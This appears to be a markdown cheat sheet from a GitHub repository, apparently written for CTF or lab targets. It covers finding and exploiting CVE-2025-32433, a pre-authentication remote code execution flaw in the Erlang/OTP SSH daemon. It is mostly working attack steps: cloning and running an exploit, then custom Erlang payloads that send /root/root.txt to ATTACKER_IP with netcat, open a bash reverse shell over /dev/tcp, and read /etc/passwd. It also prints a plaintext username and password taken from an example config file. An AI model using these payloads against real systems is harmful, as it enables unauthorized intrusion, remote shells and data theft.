Skip to content

Latest commit

 

History

History
112 lines (76 loc) · 2.02 KB

File metadata and controls

112 lines (76 loc) · 2.02 KB

Erlang OTP SSH - CVE-2025-32433

Pre-authentication RCE in Erlang/OTP SSH daemon.

Affects: Erlang/OTP versions with SSH daemon


Discovery

# Banner grab
nc TARGET 2222
# Response: SSH-2.0-Erlang/5.2.9

# Via nmap
nmap -sV -p 2222 TARGET

Indicators:

  • SSH banner contains Erlang
  • Often runs on non-standard ports (2222, etc.)
  • May only listen on localhost (requires port forward)

CVE-2025-32433 - Pre-Auth RCE

Vulnerability: Pre-authentication command execution via malformed SSH channel request.

Exploit

# Clone exploit
git clone https://github.com/platsecurity/CVE-2025-32433.git
cd CVE-2025-32433

# If service is on localhost, port forward first
ssh user@TARGET -L 2222:127.0.0.1:2222

# Run exploit (default writes to /lab.txt as PoC)
python3 CVE-2025-32433.py

Custom Payload

Modify the exploit to execute arbitrary commands:

# In exploit, change the command payload:
command = 'os:cmd("cat /root/root.txt | nc ATTACKER_IP 4444").'

# Or for reverse shell:
command = 'os:cmd("bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\'").'

Manual Erlang Commands

% Read file
os:cmd("cat /etc/passwd").

% Command execution
os:cmd("id").

% Exfiltrate via netcat
os:cmd("cat /root/root.txt | nc ATTACKER_IP 4444").

% Reverse shell
os:cmd("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'").

Finding Erlang SSH Services

# Linpeas output
/usr/local/lib/erlang_login/start.escript

# Process list
ps aux | grep erlang
ps aux | grep ssh_runner

# Listening ports
ss -tlnp | grep erlang
netstat -tlnp | grep 2222

Configuration Files

Erlang SSH daemons may have credentials in config:

% Example from start.escript
{user_passwords, [{"ben", "HouseH0ldings998"}]}

Common locations:

/usr/local/lib/erlang_login/start.escript
/opt/erlang/*/start.escript

References